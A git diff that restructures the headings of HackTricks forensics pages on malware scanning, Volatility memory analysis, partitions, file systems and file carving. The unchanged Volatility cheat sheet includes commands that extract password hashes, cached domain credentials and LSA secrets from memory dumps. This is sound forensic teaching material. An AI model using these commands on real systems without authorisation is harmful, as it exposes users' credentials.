diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md
index bc839fe8..7c9ba448 100644
--- a/forensics/basic-forensic-methodology/malware-analysis.md
+++ b/forensics/basic-forensic-methodology/malware-analysis.md
@@ -17,30 +17,28 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Malware Analysis
-
-## Forensics CheatSheets
+# Forensics CheatSheets
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/#)
-## Online Services
+# Online Services
* [VirusTotal](https://www.virustotal.com/gui/home/upload)
* [HybridAnalysis](https://www.hybrid-analysis.com)
* [Koodous](https://koodous.com)
* [Intezer](https://analyze.intezer.com)
-## Offline Antivirus and Detection Tools
+# Offline Antivirus and Detection Tools
-### Yara
+## Yara
-#### Install
+### Install
```bash
sudo apt-get install -y yara
```
-#### Prepare rules
+### Prepare rules
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
@@ -51,14 +49,14 @@ mkdir rules
python malware_yara_rules.py
```
-#### Scan
+### Scan
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan hole fodler
```
-#### YaraGen: Check for malware and Create rules
+### YaraGen: Check for malware and Create rules
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Checkout these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
@@ -67,15 +65,15 @@ You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generat
python3.exe yarGen.py --excludegood -m ../../mals/
```
-### ClamAV
+## ClamAV
-#### Install
+### Install
```
sudo apt-get install -y clamav
```
-#### Scan
+### Scan
```bash
sudo freshclam #Update rules
@@ -83,7 +81,7 @@ clamscan filepath #Scan 1 file
clamscan folderpath #Scan the hole folder
```
-### IOCs
+## IOCs
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**.\
To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
@@ -91,7 +89,7 @@ To share these definitions is very useful as when a malware is identified in a c
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
-### Loki
+## Loki
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
Detection is based on four detection methods:
@@ -110,11 +108,11 @@ Detection is based on four detection methods:
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
-### Linux Malware Detect
+## Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources.
-### rkhunter
+## rkhunter
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
@@ -122,19 +120,19 @@ Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
-### PEpper
+## PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
-### NeoPI
+## NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
-### **php-malware-finder**
+## **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
-### Apple Binary Signatures
+## Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
@@ -149,17 +147,17 @@ codesign --verify --verbose /Applications/Safari.app
spctl --assess --verbose /Applications/Safari.app
```
-## Detection Techniques
+# Detection Techniques
-### File Stacking
+## File Stacking
If you know that some folder containing the **files** of a web server was **last updated in some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
-### Baselines
+## Baselines
If the files of a folder s**houldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
-### Statistical Analysis
+## Statistical Analysis
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a webshell might be one of the most**.
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
index 6bd9dd98..3eea3876 100644
--- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Memory dump analysis
-
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
-## [Volatility](volatility-examples.md)
+# [Volatility](volatility-examples.md)
The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifact.\
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-## Mini dump crash report
+# Mini dump crash report
When the dump is small (just some KB, maybe a few MB) the it's probably a mini dump crash report and not a memory dump.
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
index 89e93dbf..f0682ea0 100644
--- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Volatility - CheatSheet
-
If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
```bash
python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # Will use most important plugins (could use a lot of space depending on the size of the memory)
```
-## Installation
+# Installation
-### volatility3
+## volatility3
```bash
git clone https://github.com/volatilityfoundation/volatility3.git
@@ -36,7 +34,7 @@ python3 setup.py install
python3 vol.py —h
```
-### volatility2
+## volatility2
{% tabs %}
{% tab title="Method1" %}
@@ -54,11 +52,11 @@ python setup.py install
{% endtab %}
{% endtabs %}
-## Volatility Commands
+# Volatility Commands
Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
-### A note on “list” vs. “scan” plugins
+## A note on “list” vs. “scan” plugins
Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes.
@@ -68,9 +66,9 @@ That makes “list” plugins pretty fast, but just as vulnerable as the Windows
From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
-## OS Profiles
+# OS Profiles
-### Volatility3
+## Volatility3
As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\
Symbol table packs for the various operating systems are available for **download** at:
@@ -79,9 +77,9 @@ Symbol table packs for the various operating systems are available for **downloa
* [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip)
* [https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip)
-### Volatility2
+## Volatility2
-#### External Profile
+### External Profile
You can get the list of supported profiles doing:
@@ -111,14 +109,14 @@ In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_
./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan
```
-#### Discover Profile
+### Discover Profile
```
volatility imageinfo -f file.dmp
volatility kdbgscan -f file.dmp
```
-#### **Differences between imageinfo and kdbgscan**
+### **Differences between imageinfo and kdbgscan**
As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it (from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)).
@@ -136,11 +134,11 @@ PsActiveProcessHead : 0xfffff800011947f0 (0 processes)
PsLoadedModuleList : 0xfffff80001197ac0 (0 modules)
```
-#### KDBG
+### KDBG
The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG** by volatility) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing.
-## OS Information
+# OS Information
```bash
#vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info)
@@ -149,7 +147,7 @@ The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGE
The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump.
-## Hashes/Passwords
+# Hashes/Passwords
Extract SAM hashes, [domain cached credentials](../../../windows/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows/authentication-credentials-uac-and-efs.md#lsa-secrets).
@@ -171,7 +169,7 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets
{% endtab %}
{% endtabs %}
-## Memory Dump
+# Memory Dump
The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
@@ -179,9 +177,9 @@ The memory dump of a process will **extract everything** of the current status o
volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
```
-## Processes
+# Processes
-### List processes
+## List processes
Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\
It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes.
@@ -205,7 +203,7 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list
{% endtab %}
{% endtabs %}
-### Dump proc
+## Dump proc
{% tabs %}
{% tab title="vol3" %}
@@ -221,7 +219,7 @@ volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f fil
{% endtab %}
{% endtabs %}
-### Command line
+## Command line
Anything suspicious was executed?
@@ -242,7 +240,7 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f
Commands entered into cmd.exe are processed by **conhost.exe** (csrss.exe prior to Windows 7). So even if an attacker managed to **kill the cmd.exe** **prior** to us obtaining a memory **dump**, there is still a good chance of **recovering history** of the command line session from **conhost.exe’s memory**. If you find **something weird** (using the consoles modules), try to **dump** the **memory** of the **conhost.exe associated** process and **search** for **strings** inside it to extract the command lines.
-### Environment
+## Environment
Get the env variables of each running process. There could be some interesting values.
@@ -262,7 +260,7 @@ volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of proc
{% endtab %}
{% endtabs %}
-### Token privileges
+## Token privileges
Check for privileges tokens in unexpected services.\
It could be interesting to list the processes using some privileged token.
@@ -287,7 +285,7 @@ volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePri
{% endtab %}
{% endtabs %}
-### SIDs
+## SIDs
Check each SSID owned by a process.\
It could be interesting to list the processes using a privileges SID (and the processes using some service SID).
@@ -308,7 +306,7 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of
{% endtab %}
{% endtabs %}
-### Handles
+## Handles
Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened)
@@ -326,7 +324,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=]
{% endtab %}
{% endtabs %}
-### DLLs
+## DLLs
{% tabs %}
{% tab title="vol3" %}
@@ -345,7 +343,7 @@ volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dm
{% endtab %}
{% endtabs %}
-### Strings per processes
+## Strings per processes
Volatility allows to check to which process does a string belongs to.
@@ -385,7 +383,7 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3
{% endtab %}
{% endtabs %}
-### UserAssist
+## UserAssist
**Windows** systems maintain a set of **keys** in the registry database (**UserAssist keys**) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**.
@@ -403,7 +401,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
{% endtab %}
{% endtabs %}
-## Services
+# Services
{% tabs %}
{% tab title="vol3" %}
@@ -423,7 +421,7 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp
{% endtab %}
{% endtabs %}
-## Network
+# Network
{% tabs %}
{% tab title="vol3" %}
@@ -451,9 +449,9 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache
{% endtab %}
{% endtabs %}
-## Registry hive
+# Registry hive
-### Print available hives
+## Print available hives
{% tabs %}
{% tab title="vol3" %}
@@ -471,7 +469,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get i
{% endtab %}
{% endtabs %}
-### Get a value
+## Get a value
{% tabs %}
{% tab title="vol3" %}
@@ -489,7 +487,7 @@ volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\
{% endtab %}
{% endtabs %}
-### Dump
+## Dump
```bash
#Dump a hive
@@ -498,9 +496,9 @@ volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset
volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp
```
-## Filesystem
+# Filesystem
-### Mount
+## Mount
{% tabs %}
{% tab title="vol3" %}
@@ -517,7 +515,7 @@ volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the en
{% endtab %}
{% endtabs %}
-### Scan/dump
+## Scan/dump
{% tabs %}
{% tab title="vol3" %}
@@ -540,7 +538,7 @@ volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O /
{% endtab %}
{% endtabs %}
-### Master File Table
+## Master File Table
{% tabs %}
{% tab title="vol3" %}
@@ -558,7 +556,7 @@ volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp
The NTFS file system contains a file called the _master file table_, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself. **All information about a file, including its size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. From [here](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
-### SSL Keys/Certs
+## SSL Keys/Certs
{% tabs %}
{% tab title="vol3" %}
@@ -577,7 +575,7 @@ volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp
{% endtab %}
{% endtabs %}
-## Malware
+# Malware
{% tabs %}
{% tab title="vol3" %}
@@ -615,7 +613,7 @@ volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers
{% endtab %}
{% endtabs %}
-### Scanning with yara
+## Scanning with yara
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
@@ -643,9 +641,9 @@ volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp |
{% endtab %}
{% endtabs %}
-## MISC
+# MISC
-### External plugins
+## External plugins
If you want to use an external plugins make sure that the plugins related folder is the first parameter used.
@@ -663,7 +661,7 @@ If you want to use an external plugins make sure that the plugins related folder
{% endtab %}
{% endtabs %}
-#### Autoruns
+### Autoruns
Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns)
@@ -671,7 +669,7 @@ Download it from [https://github.com/tomchop/volatility-autoruns](https://github
volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns
```
-### Mutexes
+## Mutexes
{% tabs %}
{% tab title="vol3" %}
@@ -688,7 +686,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p -t mutant
{% endtab %}
{% endtabs %}
-### Symlinks
+## Symlinks
{% tabs %}
{% tab title="vol3" %}
@@ -704,7 +702,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan
{% endtab %}
{% endtabs %}
-### Bash
+## Bash
It's possible to **read from memory the bash history.** You could also dump the _.bash\_history_ file, but it was disabled you will be glad you can use this volatility module
@@ -722,7 +720,7 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash
{% endtab %}
{% endtabs %}
-### TimeLine
+## TimeLine
{% tabs %}
{% tab title="vol3" %}
@@ -738,7 +736,7 @@ volatility --profile=Win7SP1x86_23418 -f timeliner
{% endtab %}
{% endtabs %}
-### Drivers
+## Drivers
{% tabs %}
{% tab title="vol3" %}
@@ -754,35 +752,35 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan
{% endtab %}
{% endtabs %}
-### Get clipboard
+## Get clipboard
```bash
#Just vol2
volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp
```
-### Get IE history
+## Get IE history
```bash
#Just vol2
volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp
```
-### Get notepad text
+## Get notepad text
```bash
#Just vol2
volatility --profile=Win7SP1x86_23418 notepad -f file.dmp
```
-### Screenshot
+## Screenshot
```bash
#Just vol2
volatility --profile=Win7SP1x86_23418 screenshot -f file.dmp
```
-### Master Boot Record (MBR)
+## Master Boot Record (MBR)
```
volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
index f01c56de..65f8d2fe 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Partitions/File Systems/Carving
-### Partitions
+# Partitions
A hard drive or a **SSD disk can contain different partitions** with the goal of separating data physically.\
The **minimum** unit of a disk is the **sector** (normally composed by 512B). So, each partition size needs to be multiple of that size.
-#### MBR (master Boot Record)
+## MBR (master Boot Record)
It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate the PC what and from where a partition should be mounted.\
It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**.. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
@@ -80,7 +79,7 @@ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
-#### GPT (GUID Partition Table)
+## GPT (GUID Partition Table)
It’s called GUID Partition Table because every partition on your drive has a **globally unique identifier**.
@@ -142,7 +141,7 @@ The partition table header defines the usable blocks on the disk. It also define
More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
-#### Inspecting
+## Inspecting
After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image a **MBR** was detected on the **sector 0** and interpreted:
@@ -150,9 +149,9 @@ After mounting the forensics image with [**ArsenalImageMounter**](https://arsena
If it was a **GPT table instead of a MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
-### File-Systems
+# File-Systems
-#### Windows file-systems list
+## Windows file-systems list
* **FAT12/16**: MSDOS, WIN95/98/NT/200
* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
@@ -160,7 +159,7 @@ If it was a **GPT table instead of a MBR** it should appear the signature _EFI P
* **NTFS**: XP/2003/2008/2012/VISTA/7/8/10
* **ReFS**: 2012/2016
-#### FAT
+## FAT
The **FAT (File Allocation Table)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located.
@@ -184,13 +183,13 @@ The **root directory** occupies a **specific position** for both FAT12 and FAT16
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
-#### **NTFS**
+## **NTFS**
{% content-ref url="ntfs.md" %}
[ntfs.md](ntfs.md)
{% endcontent-ref %}
-#### EXT
+## EXT
**Ext2** is the most common file-system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
@@ -198,7 +197,7 @@ When a file is "deleted" using a FAT file system, the directory entry remains al
[ext.md](ext.md)
{% endcontent-ref %}
-### **Metadata**
+# **Metadata**
Some files contains metadata. This is information about the content of the file which sometimes might be interesting for the analyst as depending on the file-type it might have information like:
@@ -212,9 +211,9 @@ Some files contains metadata. This is information about the content of the file
You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file.
-### **Deleted Files Recovery**
+# **Deleted Files Recovery**
-#### Logged Deleted Files
+## Logged Deleted Files
As it was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file-system just mark it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files.
@@ -224,7 +223,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
-#### **File Carving**
+## **File Carving**
**File carving** is a technique that tries to **find files in a bulk of data**. There are 3 main ways tools like this works: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself.
@@ -236,7 +235,7 @@ There are several tools that you can use for file Carving indicating them the fi
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
-#### Data Stream **C**arving
+## Data Stream **C**arving
Data Stream Carving is similar to File Carving but i**nstead of looking for complete files, it looks for interesting fragments** of information.\
For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs.
@@ -245,12 +244,12 @@ For example, instead of looking for a complete file containing logged URLs, this
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
-#### Secure Deletion
+## Secure Deletion
Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
-### References
+# References
* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
index 04bb309c..1073b1b2 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# EXT
-
-## Ext - Extended Filesystem
+# Ext - Extended Filesystem
**Ext2** is the most common filesystem for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**.
@@ -36,7 +34,7 @@ Every block group contains the following pieces of information:
.png>)
-### Ext Optional Features
+## Ext Optional Features
**Features affect where** the data is located, **how** the data is stored in inodes and some of them might supply **additional metadata** for analysis, therefore features are important in Ext.
@@ -54,7 +52,7 @@ Suspected attacker might have non-standard extensions
**Any utility** that reads the **superblock** will be able to indicate the **features** of a **Ext filesystem**, but you could also use `file -sL /dev/sd*`
-### Superblock
+## Superblock
The superblock is the first 1024 bytes from the start, it's repeated in the first block of each group and contains:
@@ -80,7 +78,7 @@ fsstat -o /pat/to/filesystem-file.ext
You can also use the free gui application: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Or you can also use **python** to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
-### inodes
+## inodes
The **inodes** contain the list of **blocks** that **contains** the actual **data** of a **file**.\
If the file is big, and inode **may contain pointers** to **other inodes** that points to the blocks/more inodes containing the file data.
@@ -233,7 +231,7 @@ getfattr file.txt #Get extended attribute names of a file
getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret"
```
-### Filesystem View
+## Filesystem View
In order to see the contents of the file system you can **use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Or you can mount it in your linux using `mount` command.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index a83a5c61..965d216d 100644
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# File/Data Carving & Recovery Tools
-
-## Carving & Recovery tools
+# Carving & Recovery tools
More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery)
-### Autopsy
+## Autopsy
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
-### Binwalk
+## Binwalk
**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.\
It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.\
@@ -40,7 +38,7 @@ binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
-### Foremost
+## Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
@@ -50,7 +48,7 @@ foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
-### **Scalpel**
+## **Scalpel**
**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
@@ -59,7 +57,7 @@ sudo apt-get install scalpel
scalpel file.img -o output
```
-### Bulk Extractor
+## Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
@@ -71,7 +69,7 @@ bulk_extractor memory.img -o out_folder
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
-### PhotoRec
+## PhotoRec
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
@@ -79,11 +77,11 @@ It comes with GUI and CLI version. You can select the **file-types** you want Ph
.png>)
-### binvis
+## binvis
Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
-#### Features of BinVis
+### Features of BinVis
* visual and active **structure viewer**
* multiple plots for different focus points
@@ -96,15 +94,15 @@ Check the [code](https://code.google.com/archive/p/binvis/) and the [web page to
BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
-## Specific Data Carving Tools
+# Specific Data Carving Tools
-### FindAES
+## FindAES
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
Download [here](https://sourceforge.net/projects/findaes/).
-## Complementary tools
+# Complementary tools
